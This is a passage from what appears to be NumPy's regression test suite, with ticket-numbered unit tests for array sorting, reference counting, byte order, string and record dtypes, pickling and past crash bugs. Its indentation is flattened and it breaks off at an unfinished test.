assert_equal(np.sort(b, axis=0), a)
def test_refcount_vdot(self, level=rlevel):
"""Changeset #3443"""
_assert_valid_refcount(np.vdot)
def test_startswith(self, level=rlevel):
ca = np.char.array(['Hi', 'There'])
assert_equal(ca.startswith('H'), [True, False])
def test_noncommutative_reduce_accumulate(self, level=rlevel):
"""Ticket #413"""
tosubtract = np.arange(5)
todivide = np.array([2.0, 0.5, 0.25])
assert_equal(np.subtract.reduce(tosubtract), -10)
assert_equal(np.divide.reduce(todivide), 16.0)
assert_array_equal(np.subtract.accumulate(tosubtract),
np.array([0, -1, -3, -6, -10]))
assert_array_equal(np.divide.accumulate(todivide),
np.array([2., 4., 16.]))
def test_convolve_empty(self, level=rlevel):
"""Convolve should raise an error for empty input array."""
self.assertRaises(ValueError, np.convolve, [], [1])
self.assertRaises(ValueError, np.convolve, [1], [])
def test_multidim_byteswap(self, level=rlevel):
"""Ticket #449"""
r=np.array([(1, (0, 1, 2))], dtype="i2,3i2")
assert_array_equal(r.byteswap(),
np.array([(256, (0, 256, 512))], r.dtype))
def test_string_NULL(self, level=rlevel):
"""Changeset 3557"""
assert_equal(np.array("a\x00\x0b\x0c\x00").item(),
'a\x00\x0b\x0c')
def test_junk_in_string_fields_of_recarray(self, level=rlevel):
"""Ticket #483"""
r = np.array([[asbytes('abc')]], dtype=[('var1', '|S20')])
assert_(asbytes(r['var1'][0][0]) == asbytes('abc'))
def test_take_output(self, level=rlevel):
"""Ensure that 'take' honours output parameter."""
x = np.arange(12).reshape((3, 4))
a = np.take(x, [0, 2], axis=1)
b = np.zeros_like(a)
np.take(x, [0, 2], axis=1, out=b)
assert_array_equal(a, b)
def test_take_object_fail(self):
# Issue gh-3001
d = 123.
a = np.array([d, 1], dtype=object)
ref_d = sys.getrefcount(d)
try:
a.take([0, 100])
except IndexError:
pass
assert_(ref_d == sys.getrefcount(d))
def test_array_str_64bit(self, level=rlevel):
"""Ticket #501"""
s = np.array([1, np.nan], dtype=np.float64)
with np.errstate(all='raise'):
sstr = np.array_str(s)
def test_frompyfunc_endian(self, level=rlevel):
"""Ticket #503"""
from math import radians
uradians = np.frompyfunc(radians, 1, 1)
big_endian = np.array([83.4, 83.5], dtype='>f8')
little_endian = np.array([83.4, 83.5], dtype='<f8')
assert_almost_equal(uradians(big_endian).astype(float),
uradians(little_endian).astype(float))
def test_mem_string_arr(self, level=rlevel):
"""Ticket #514"""
s = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
t = []
np.hstack((t, s ))
def test_arr_transpose(self, level=rlevel):
"""Ticket #516"""
x = np.random.rand(*(2,)*16)
y = x.transpose(list(range(16)))
def test_string_mergesort(self, level=rlevel):
"""Ticket #540"""
x = np.array(['a']*32)
assert_array_equal(x.argsort(kind='m'), np.arange(32))
def test_argmax_byteorder(self, level=rlevel):
"""Ticket #546"""
a = np.arange(3, dtype='>f')
assert_(a[a.argmax()] == a.max())
def test_rand_seed(self, level=rlevel):
"""Ticket #555"""
for l in np.arange(4):
np.random.seed(l)
def test_mem_deallocation_leak(self, level=rlevel):
"""Ticket #562"""
a = np.zeros(5, dtype=float)
b = np.array(a, dtype=float)
del a, b
def test_mem_on_invalid_dtype(self):
"Ticket #583"
self.assertRaises(ValueError, np.fromiter, [['12', ''], ['13', '']], str)
def test_dot_negative_stride(self, level=rlevel):
"""Ticket #588"""
x = np.array([[1, 5, 25, 125., 625]])
y = np.array([[20.], [160.], [640.], [1280.], [1024.]])
z = y[::-1].copy()
y2 = y[::-1]
assert_equal(np.dot(x, z), np.dot(x, y2))
def test_object_casting(self, level=rlevel):
# This used to trigger the object-type version of
# the bitwise_or operation, because float64 -> object
# casting succeeds
def rs():
x = np.ones([484, 286])
y = np.zeros([484, 286])
x |= y
self.assertRaises(TypeError, rs)
def test_unicode_scalar(self, level=rlevel):
"""Ticket #600"""
x = np.array(["DROND", "DROND1"], dtype="U6")
el = x[1]
new = pickle.loads(pickle.dumps(el))
assert_equal(new, el)
def test_arange_non_native_dtype(self, level=rlevel):
"""Ticket #616"""
for T in ('>f4', '<f4'):
dt = np.dtype(T)
assert_equal(np.arange(0, dtype=dt).dtype, dt)
assert_equal(np.arange(0.5, dtype=dt).dtype, dt)
assert_equal(np.arange(5, dtype=dt).dtype, dt)
def test_bool_indexing_invalid_nr_elements(self, level=rlevel):
s = np.ones(10, dtype=float)
x = np.array((15,), dtype=float)
def ia(x, s, v): x[(s>0)]=v
self.assertRaises(ValueError, ia, x, s, np.zeros(9, dtype=float))
self.assertRaises(ValueError, ia, x, s, np.zeros(11, dtype=float))
# Old special case (different code path):
self.assertRaises(ValueError, ia, x.flat, s, np.zeros(9, dtype=float))
def test_mem_scalar_indexing(self, level=rlevel):
"""Ticket #603"""
x = np.array([0], dtype=float)
index = np.array(0, dtype=np.int32)
x[index]
def test_binary_repr_0_width(self, level=rlevel):
assert_equal(np.binary_repr(0, width=3), '000')
def test_fromstring(self, level=rlevel):
assert_equal(np.fromstring("12:09:09", dtype=int, sep=":"),
[12, 9, 9])
def test_searchsorted_variable_length(self, level=rlevel):
x = np.array(['a', 'aa', 'b'])
y = np.array(['d', 'e'])
assert_equal(x.searchsorted(y), [3, 3])
def test_string_argsort_with_zeros(self, level=rlevel):
"""Check argsort for strings containing zeros."""
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
assert_array_equal(x.argsort(kind='m'), np.array([1, 0]))
assert_array_equal(x.argsort(kind='q'), np.array([1, 0]))
def test_string_sort_with_zeros(self, level=rlevel):
"""Check sort for strings containing zeros."""
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
y = np.fromstring("\x00\x01\x00\x02", dtype="|S2")
assert_array_equal(np.sort(x, kind="q"), y)
def test_copy_detection_zero_dim(self, level=rlevel):
"""Ticket #658"""
np.indices((0, 3, 4)).T.reshape(-1, 3)
def test_flat_byteorder(self, level=rlevel):
"""Ticket #657"""
x = np.arange(10)
assert_array_equal(x.astype('>i4'), x.astype('<i4').flat[:])
assert_array_equal(x.astype('>i4').flat[:], x.astype('<i4'))
def test_uint64_from_negative(self, level=rlevel) :
assert_equal(np.uint64(-2), np.uint64(18446744073709551614))
def test_sign_bit(self, level=rlevel):
x = np.array([0, -0.0, 0])
assert_equal(str(np.abs(x)), '[ 0. 0. 0.]')
def test_flat_index_byteswap(self, level=rlevel):
for dt in (np.dtype('<i4'), np.dtype('>i4')):
x = np.array([-1, 0, 1], dtype=dt)
assert_equal(x.flat[0].dtype, x[0].dtype)
def test_copy_detection_corner_case(self, level=rlevel):
"""Ticket #658"""
np.indices((0, 3, 4)).T.reshape(-1, 3)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous,
# 0-sized reshape itself is tested elsewhere.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_copy_detection_corner_case2(self, level=rlevel):
"""Ticket #771: strides are not set correctly when reshaping 0-sized
arrays"""
b = np.indices((0, 3, 4)).T.reshape(-1, 3)
assert_equal(b.strides, (3 * b.itemsize, b.itemsize))
def test_object_array_refcounting(self, level=rlevel):
"""Ticket #633"""
if not hasattr(sys, 'getrefcount'):
return
# NB. this is probably CPython-specific
cnt = sys.getrefcount
a = object()
b = object()
c = object()
cnt0_a = cnt(a)
cnt0_b = cnt(b)
cnt0_c = cnt(c)
# -- 0d -> 1d broadcasted slice assignment
arr = np.zeros(5, dtype=np.object_)
arr[:] = a
assert_equal(cnt(a), cnt0_a + 5)
arr[:] = b
assert_equal(cnt(a), cnt0_a)
assert_equal(cnt(b), cnt0_b + 5)
arr[:2] = c
assert_equal(cnt(b), cnt0_b + 3)
assert_equal(cnt(c), cnt0_c + 2)
del arr
# -- 1d -> 2d broadcasted slice assignment
arr = np.zeros((5, 2), dtype=np.object_)
arr0 = np.zeros(2, dtype=np.object_)
arr0[0] = a
assert_(cnt(a) == cnt0_a + 1)
arr0[1] = b
assert_(cnt(b) == cnt0_b + 1)
arr[:,:] = arr0
assert_(cnt(a) == cnt0_a + 6)
assert_(cnt(b) == cnt0_b + 6)
arr[:, 0] = None
assert_(cnt(a) == cnt0_a + 1)
del arr, arr0
# -- 2d copying + flattening
arr = np.zeros((5, 2), dtype=np.object_)
arr[:, 0] = a
arr[:, 1] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
arr2 = arr[:, 0].copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.flatten()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
del arr, arr2
# -- concatenate, repeat, take, choose
arr1 = np.zeros((5, 1), dtype=np.object_)
arr2 = np.zeros((5, 1), dtype=np.object_)
arr1[...] = a
arr2[...] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr3 = np.concatenate((arr1, arr2))
assert_(cnt(a) == cnt0_a + 5 + 5)
assert_(cnt(b) == cnt0_b + 5 + 5)
arr3 = arr1.repeat(3, axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3*5)
arr3 = arr1.take([1, 2, 3], axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3)
x = np.array([[0], [1], [0], [1], [1]], int)
arr3 = x.choose(arr1, arr2)
assert_(cnt(a) == cnt0_a + 5 + 2)
assert_(cnt(b) == cnt0_b + 5 + 3)
def test_mem_custom_float_to_array(self, level=rlevel):
"""Ticket 702"""
class MyFloat(object):
def __float__(self):
return 1.0
tmp = np.atleast_1d([MyFloat()])
tmp2 = tmp.astype(float)
def test_object_array_refcount_self_assign(self, level=rlevel):
"""Ticket #711"""
class VictimObject(object):
deleted = False
def __del__(self):
self.deleted = True
d = VictimObject()
arr = np.zeros(5, dtype=np.object_)
arr[:] = d
del d
arr[:] = arr # refcount of 'd' might hit zero here
assert_(not arr[0].deleted)
arr[:] = arr # trying to induce a segfault by doing it again...
assert_(not arr[0].deleted)
def test_mem_fromiter_invalid_dtype_string(self, level=rlevel):
x = [1, 2, 3]
self.assertRaises(ValueError,
np.fromiter, [xi for xi in x], dtype='S')
def test_reduce_big_object_array(self, level=rlevel):
"""Ticket #713"""
oldsize = np.setbufsize(10*16)
a = np.array([None]*161, object)
assert_(not np.any(a))
np.setbufsize(oldsize)
def test_mem_0d_array_index(self, level=rlevel):
"""Ticket #714"""
np.zeros(10)[np.array(0)]
def test_floats_from_string(self, level=rlevel):
"""Ticket #640, floats from string"""
fsingle = np.single('1.234')
fdouble = np.double('1.234')
flongdouble = np.longdouble('1.234')
assert_almost_equal(fsingle, 1.234)
assert_almost_equal(fdouble, 1.234)
assert_almost_equal(flongdouble, 1.234)
def test_nonnative_endian_fill(self, level=rlevel):
""" Non-native endian arrays were incorrectly filled with scalars before
r5034.
"""
if sys.byteorder == 'little':
dtype = np.dtype('>i4')
else:
dtype = np.dtype('<i4')
x = np.empty([1], dtype=dtype)
x.fill(1)
assert_equal(x, np.array([1], dtype=dtype))
def test_dot_alignment_sse2(self, level=rlevel):
"""Test for ticket #551, changeset r5140"""
x = np.zeros((30, 40))
y = pickle.loads(pickle.dumps(x))
# y is now typically not aligned on a 8-byte boundary
z = np.ones((1, y.shape[0]))
# This shouldn't cause a segmentation fault:
np.dot(z, y)
def test_astype_copy(self, level=rlevel):
"""Ticket #788, changeset r5155"""
# The test data file was generated by scipy.io.savemat.
# The dtype is float64, but the isbuiltin attribute is 0.
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, "astype_copy.pkl")
if sys.version_info[0] >= 3:
f = open(filename, 'rb')
xp = pickle.load(f, encoding='latin1')
f.close()
else:
f = open(filename)
xp = pickle.load(f)
f.close()
xpd = xp.astype(np.float64)
assert_((xp.__array_interface__['data'][0] !=
xpd.__array_interface__['data'][0]))
def test_compress_small_type(self, level=rlevel):
"""Ticket #789, changeset 5217.
"""
# compress with out argument segfaulted if cannot cast safely
import numpy as np
a = np.array([[1, 2], [3, 4]])
b = np.zeros((2, 1), dtype = np.single)
try:
a.compress([True, False], axis = 1, out = b)
raise AssertionError("compress with an out which cannot be " \
"safely casted should not return "\
"successfully")
except TypeError:
pass
def test_attributes(self, level=rlevel):
"""Ticket #791
"""
class TestArray(np.ndarray):
def __new__(cls, data, info):
result = np.array(data)
result = result.view(cls)
result.info = info
return result
def __array_finalize__(self, obj):
self.info = getattr(obj, 'info', '')
dat = TestArray([[1, 2, 3, 4], [5, 6, 7, 8]], 'jubba')
assert_(dat.info == 'jubba')
dat.resize((4, 2))
assert_(dat.info == 'jubba')
dat.sort()
assert_(dat.info == 'jubba')
dat.fill(2)
assert_(dat.info == 'jubba')
dat.put([2, 3, 4], [6, 3, 4])
assert_(dat.info == 'jubba')
dat.setfield(4, np.int32, 0)
assert_(dat.info == 'jubba')
dat.setflags()
assert_(dat.info == 'jubba')
assert_(dat.all(1).info == 'jubba')
assert_(dat.any(1).info == 'jubba')
assert_(dat.argmax(1).info == 'jubba')
assert_(dat.argmin(1).info == 'jubba')
assert_(dat.argsort(1).info == 'jubba')
assert_(dat.astype(TestArray).info == 'jubba')
assert_(dat.byteswap().info == 'jubba')
assert_(dat.clip(2, 7).info == 'jubba')
assert_(dat.compress([0, 1, 1]).info == 'jubba')
assert_(dat.conj().info == 'jubba')
assert_(dat.conjugate().info == 'jubba')
assert_(dat.copy().info == 'jubba')
dat2 = TestArray([2, 3, 1, 0], 'jubba')
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
assert_(dat2.choose(choices).info == 'jubba')
assert_(dat.cumprod(1).info == 'jubba')
assert_(dat.cumsum(1).info == 'jubba')
assert_(dat.diagonal().info == 'jubba')
assert_(dat.flatten().info == 'jubba')
assert_(dat.getfield(np.int32, 0).info == 'jubba')
assert_(dat.imag.info == 'jubba')
assert_(dat.max(1).info == 'jubba')
assert_(dat.mean(1).info == 'jubba')
assert_(dat.min(1).info == 'jubba')
assert_(dat.newbyteorder().info == 'jubba')
assert_(dat.nonzero()[0].info == 'jubba')
assert_(dat.nonzero()[1].info == 'jubba')
assert_(dat.prod(1).info == 'jubba')
assert_(dat.ptp(1).info == 'jubba')
assert_(dat.ravel().info == 'jubba')
assert_(dat.real.info == 'jubba')
assert_(dat.repeat(2).info == 'jubba')
assert_(dat.reshape((2, 4)).info == 'jubba')
assert_(dat.round().info == 'jubba')
assert_(dat.squeeze().info == 'jubba')
assert_(dat.std(1).info == 'jubba')
assert_(dat.sum(1).info == 'jubba')
assert_(dat.swapaxes(0, 1).info == 'jubba')
assert_(dat.take([2, 3, 5]).info == 'jubba')
assert_(dat.transpose().info == 'jubba')
assert_(dat.T.info == 'jubba')
assert_(dat.var(1).info == 'jubba')
assert_(dat.view(TestArray).info == 'jubba')
def test_recarray_tolist(self, level=rlevel):
"""Ticket #793, changeset r5215
"""
# Comparisons fail for NaN, so we can't use random memory
# for the test.
buf = np.zeros(40, dtype=np.int8)
a = np.recarray(2, formats="i4,f8,f8", names="id,x,y", buf=buf)
b = a.tolist()
assert_( a[0].tolist() == b[0])
assert_( a[1].tolist() == b[1])
def test_nonscalar_item_method(self):
# Make sure that .item() fails graciously when it should
a = np.arange(5)
assert_raises(ValueError, a.item)
def test_char_array_creation(self, level=rlevel):
a = np.array('123', dtype='c')
b = np.array(asbytes_nested(['1', '2', '3']))
assert_equal(a, b)
def test_unaligned_unicode_access(self, level=rlevel) :
"""Ticket #825"""
for i in range(1, 9) :
msg = 'unicode offset: %d chars'%i
t = np.dtype([('a', 'S%d'%i), ('b', 'U2')])
x = np.array([(asbytes('a'), sixu('b'))], dtype=t)
if sys.version_info[0] >= 3:
assert_equal(str(x), "[(b'a', 'b')]", err_msg=msg)
else:
assert_equal(str(x), "[('a', u'b')]", err_msg=msg)
def test_sign_for_complex_nan(self, level=rlevel):
"""Ticket 794."""
with np.errstate(invalid='ignore'):
C = np.array([-np.inf, -2+1j, 0, 2-1j, np.inf, np.nan])
have = np.sign(C)
want = np.array([-1+0j, -1+0j, 0+0j, 1+0j, 1+0j, np.nan])
assert_equal(have, want)
def test_for_equal_names(self, level=rlevel):
"""Ticket #674"""
dt = np.dtype([('foo', float), ('bar', float)])
a = np.zeros(10, dt)
b = list(a.dtype.names)
b[0] = "notfoo"
a.dtype.names = b
assert_(a.dtype.names[0] == "notfoo")
assert_(a.dtype.names[1] == "bar")
def test_for_object_scalar_creation(self, level=rlevel):
"""Ticket #816"""
a = np.object_()
b = np.object_(3)
b2 = np.object_(3.0)
c = np.object_([4, 5])
d = np.object_([None, {}, []])
assert_(a is None)
assert_(type(b) is int)
assert_(type(b2) is float)
assert_(type(c) is np.ndarray)
assert_(c.dtype == object)
assert_(d.dtype == object)
def test_array_resize_method_system_error(self):
"""Ticket #840 - order should be an invalid keyword."""
x = np.array([[0, 1], [2, 3]])
self.assertRaises(TypeError, x.resize, (2, 2), order='C')
def test_for_zero_length_in_choose(self, level=rlevel):
"Ticket #882"
a = np.array(1)
self.assertRaises(ValueError, lambda x: x.choose([]), a)
def test_array_ndmin_overflow(self):
"Ticket #947."
self.assertRaises(ValueError, lambda: np.array([1], ndmin=33))
def test_errobj_reference_leak(self, level=rlevel):
"""Ticket #955"""
with np.errstate(all="ignore"):
z = int(0)
p = np.int32(-1)
gc.collect()
n_before = len(gc.get_objects())
z**p # this shouldn't leak a reference to errobj
gc.collect()
n_after = len(gc.get_objects())
assert_(n_before >= n_after, (n_before, n_after))
def test_void_scalar_with_titles(self, level=rlevel):
"""No ticket"""
data = [('john', 4), ('mary', 5)]
dtype1 = [(('source:yy', 'name'), 'O'), (('source:xx', 'id'), int)]
arr = np.array(data, dtype=dtype1)
assert_(arr[0][0] == 'john')
assert_(arr[0][1] == 4)
def test_void_scalar_constructor(self):
#Issue #1550
#Create test string data, construct void scalar from data and assert
#that void scalar contains original data.
test_string = np.array("test")
test_string_void_scalar = np.core.multiarray.scalar(
np.dtype(("V", test_string.dtype.itemsize)), test_string.tobytes())
assert_(test_string_void_scalar.view(test_string.dtype) == test_string)
#Create record scalar, construct from data and assert that
#reconstructed scalar is correct.
test_record = np.ones((), "i,i")
test_record_void_scalar = np.core.multiarray.scalar(
test_record.dtype, test_record.tobytes())
assert_(test_record_void_scalar == test_record)
#Test pickle and unpickle of void and record scalars
assert_(pickle.loads(pickle.dumps(test_string)) == test_string)
assert_(pickle.loads(pickle.dumps(test_record)) == test_record)
def test_blasdot_uninitialized_memory(self):
"""Ticket #950"""
for m in [0, 1, 2]:
for n in [0, 1, 2]:
for k in range(3):
# Try to ensure that x->data contains non-zero floats
x = np.array([123456789e199], dtype=np.float64)
x.resize((m, 0))
y = np.array([123456789e199], dtype=np.float64)
y.resize((0, n))
# `dot` should just return zero (m,n) matrix
z = np.dot(x, y)
assert_(np.all(z == 0))
assert_(z.shape == (m, n))
def test_zeros(self):
"""Regression test for #1061."""
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed dimension exceeded'
try:
np.empty(sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_huge_arange(self):
"""Regression test for #1062."""
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed size exceeded'
try:
a = np.arange(sz)
self.assertTrue(np.size == sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_fromiter_bytes(self):
"""Ticket #1058"""
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_array_from_sequence_scalar_array(self):
"""Ticket #1078: segfaults when creating an array with a sequence of 0d
arrays."""
a = np.array((np.ones(2), np.array(2)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], np.ones(2))
assert_equal(a[1], np.array(2))
a = np.array(((1,), np.array(1)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], (1,))
assert_equal(a[1], np.array(1))
def test_array_from_sequence_scalar_array2(self):
"""Ticket #1081: weird array with strange input..."""
t = np.array([np.array([]), np.array(0, object)])
assert_equal(t.shape, (2,))
assert_equal(t.dtype, np.dtype(object))
def test_array_too_big(self):
"""Ticket #1080."""
assert_raises(ValueError, np.zeros, [975]*7, np.int8)
assert_raises(ValueError, np.zeros, [26244]*5, np.int8)
def test_dtype_keyerrors_(self):
"""Ticket #1106."""
dt = np.dtype([('f1', np.uint)])
assert_raises(KeyError, dt.__getitem__, "f2")
assert_raises(IndexError, dt.__getitem__, 1)
assert_raises(ValueError, dt.__getitem__, 0.0)
def test_lexsort_buffer_length(self):
"""Ticket #1217, don't segfault."""
a = np.ones(100, dtype=np.int8)
b = np.ones(100, dtype=np.int32)
i = np.lexsort((a[::-1], b))
assert_equal(i, np.arange(100, dtype=np.int))
def test_object_array_to_fixed_string(self):
"""Ticket #1235."""
a = np.array(['abcdefgh', 'ijklmnop'], dtype=np.object_)
b = np.array(a, dtype=(np.str_, 8))
assert_equal(a, b)
c = np.array(a, dtype=(np.str_, 5))
assert_equal(c, np.array(['abcde', 'ijklm']))
d = np.array(a, dtype=(np.str_, 12))
assert_equal(a, d)
e = np.empty((2, ), dtype=(np.str_, 8))
e[:] = a[:]
assert_equal(a, e)
def test_unicode_to_string_cast(self):
"""Ticket #1240."""
a = np.array(
[ [sixu('abc'), sixu('\u03a3')],
[sixu('asdf'), sixu('erw')]
], dtype='U')
def fail():
b = np.array(a, 'S4')
self.assertRaises(UnicodeEncodeError, fail)
def test_mixed_string_unicode_array_creation(self):
a = np.array(['1234', sixu('123')])
assert_(a.itemsize == 16)
a = np.array([sixu('123'), '1234'])
assert_(a.itemsize == 16)
a = np.array(['1234', sixu('123'), '12345'])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('12345')])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('1234')])
assert_(a.itemsize == 16)
def test_misaligned_objects_segfault(self):
"""Ticket #1198 and #1267"""
a1 = np.zeros((10,), dtype='O,c')
a2 = np.array(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 'S10')
a1['f0'] = a2
r = repr(a1)
np.argmax(a1['f0'])
a1['f0'][1] = "FOO"
a1['f0'] = "FOO"
a3 = np.array(a1['f0'], dtype='S')
np.nonzero(a1['f0'])
a1.sort()
a4 = copy.deepcopy(a1)
def test_misaligned_scalars_segfault(self):
"""Ticket #1267"""
s1 = np.array(('a', 'Foo'), dtype='c,O')
s2 = np.array(('b', 'Bar'), dtype='c,O')
s1['f1'] = s2['f1']
s1['f1'] = 'Baz'
def test_misaligned_dot_product_objects(self):
"""Ticket #1267"""
# This didn't require a fix, but it's worth testing anyway, because
# it may fail if .dot stops enforcing the arrays to be BEHAVED
a = np.array([[(1, 'a'), (0, 'a')], [(0, 'a'), (1, 'a')]], dtype='O,c')
b = np.array([[(4, 'a'), (1, 'a')], [(2, 'a'), (2, 'a')]], dtype='O,c')
np.dot(a['f0'], b['f0'])
def test_byteswap_complex_scalar(self):
"""Ticket #1259 and gh-441"""
for dtype in [np.dtype('<'+t) for t in np.typecodes['Complex']]:
z = np.array([2.2-1.1j], dtype)
x = z[0] # always native-endian
y = x.byteswap()
if x.dtype.byteorder == z.dtype.byteorder:
# little-endian machine
assert_equal(x, np.fromstring(y.tobytes(), dtype=dtype.newbyteorder()))
else:
# big-endian machine
assert_equal(x, np.fromstring(y.tobytes(), dtype=dtype))
# double check real and imaginary parts:
assert_equal(x.real, y.real.byteswap())
assert_equal(x.imag, y.imag.byteswap())
def test_structured_arrays_with_objects1(self):
"""Ticket #1299"""
stra = 'aaaa'
strb = 'bbbb'
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(x[0, 1] == x[0, 0])
def test_structured_arrays_with_objects2(self):
"""Ticket #1299 second test"""
stra = 'aaaa'
strb = 'bbbb'
numb = sys.getrefcount(strb)
numa = sys.getrefcount(stra)
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(sys.getrefcount(strb) == numb)
assert_(sys.getrefcount(stra) == numa + 2)
def test_duplicate_title_and_name(self):
"""Ticket #1254"""
def func():
x = np.dtype([(('a', 'a'), 'i'), ('b', 'i')])
self.assertRaises(ValueError, func)
def test_signed_integer_division_overflow(self):
"""Ticket #1317."""
def test_type(t):
min = np.array([np.iinfo(t).min])
min //= -1
with np.errstate(divide="ignore"):
for t in (np.int8, np.int16, np.int32, np.int64, np.int, np.long):
test_type(t)
def test_buffer_hashlib(self):
try:
from hashlib import md5
except ImportError:
from md5 import new as md5
x = np.array([1, 2, 3], dtype=np.dtype('<i4'))
assert_equal(md5(x).hexdigest(), '2a1dd1e1e59d0a384c26951e316cd7e6')
def test_0d_string_scalar(self):
# Bug #1436; the following should succeed
np.asarray('x', '>c')
def test_log1p_compiler_shenanigans(self):
# Check if log1p is behaving on 32 bit intel systems.
assert_(np.isfinite(np.log1p(np.exp2(-53))))
def test_fromiter_comparison(self, level=rlevel):
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_fromstring_crash(self):
# Ticket #1345: the following should not cause a crash
np.fromstring(asbytes('aa, aa, 1.0'), sep=',')
def test_ticket_1539(self):
dtypes = [x for x in np.typeDict.values()
if (issubclass(x, np.number)
and not issubclass(x, np.timedelta64))]
a = np.array([], dtypes[0])
failures = []
# ignore complex warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', np.ComplexWarning)
for x in dtypes:
b = a.astype(x)
for y in dtypes:
c = a.astype(y)
try:
np.dot(b, c)
except TypeError as e:
failures.append((x, y))
if failures:
raise AssertionError("Failures: %r" % failures)
def test_ticket_1538(self):
x = np.finfo(np.float32)
for name in 'eps epsneg max min resolution tiny'.split():
assert_equal(type(getattr(x, name)), np.float32,
err_msg=name)
def test_ticket_1434(self):
# Check that the out= argument in var and std has an effect
data = np.array(((1, 2, 3), (4, 5, 6), (7, 8, 9)))
out = np.zeros((3,))
ret = data.var(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.var(axis=1))
ret = data.std(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.std(axis=1))
def test_complex_nan_maximum(self):
cnan = complex(0, np.nan)
assert_equal(np.maximum(1, cnan), cnan)
def test_subclass_int_tuple_assignment(self):
# ticket #1563
class Subclass(np.ndarray):
def __new__(cls, i):
return np.ones((i,)).view(cls)
x = Subclass(5)
x[(0,)] = 2 # shouldn't raise an exception
assert_equal(x[0], 2)
def test_ufunc_no_unnecessary_views(self):
# ticket #1548
class Subclass(np.ndarray):
pass
x = np.array([1, 2, 3]).view(Subclass)
y = np.add(x, x, x)
assert_equal(id(x), id(y))
def test_take_refcount(self):
# ticket #939
a = np.arange(16, dtype=np.float)
a.shape = (4, 4)
lut = np.ones((5 + 3, 4), np.float)
rgba = np.empty(shape=a.shape + (4,), dtype=lut.dtype)
c1 = sys.getrefcount(rgba)
try:
lut.take(a, axis=0, mode='clip', out=rgba)
except TypeError:
pass
c2 = sys.getrefcount(rgba)
assert_equal(c1, c2)
def test_fromfile_tofile_seeks(self):
# On Python 3, tofile/fromfile used to get (#1610) the Python
# file handle out of sync
f0 = tempfile.NamedTemporaryFile()
f = f0.file
f.write(np.arange(255, dtype='u1').tobytes())
f.seek(20)
ret = np.fromfile(f, count=4, dtype='u1')
assert_equal(ret, np.array([20, 21, 22, 23], dtype='u1'))
assert_equal(f.tell(), 24)
f.seek(40)
np.array([1, 2, 3], dtype='u1').tofile(f)
assert_equal(f.tell(), 43)
f.seek(40)
data = f.read(3)
assert_equal(data, asbytes("\x01\x02\x03"))
f.seek(80)
f.read(4)
data = np.fromfile(f, dtype='u1', count=4)
assert_equal(data, np.array([84, 85, 86, 87], dtype='u1'))
f.close()
def test_complex_scalar_warning(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_warns(np.ComplexWarning, float, x)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
assert_equal(float(x), float(x.real))
def test_complex_scalar_complex_cast(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_equal(complex(x), 1+2j)
def test_complex_boolean_cast(self):
"""Ticket #2218"""
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = np.array([0, 0+0.5j, 0.5+0j], dtype=tp)
assert_equal(x.astype(bool), np.array([0, 1, 1], dtype=bool))
assert_(np.any(x))
assert_(np.all(x[1:]))
def test_uint_int_conversion(self):
x = 2**64 - 1
assert_equal(int(np.uint64(x)), x)
def test_duplicate_field_names_assign(self):
ra = np.fromiter(((i*3, i*2) for i in range(10)), dtype='i8,f8')
ra.dtype.names = ('f1', 'f2')
rep = repr(ra) # should not cause a segmentation fault
assert_raises(ValueError, setattr, ra.dtype, 'names', ('f1', 'f1'))
def test_eq_string_and_object_array(self):
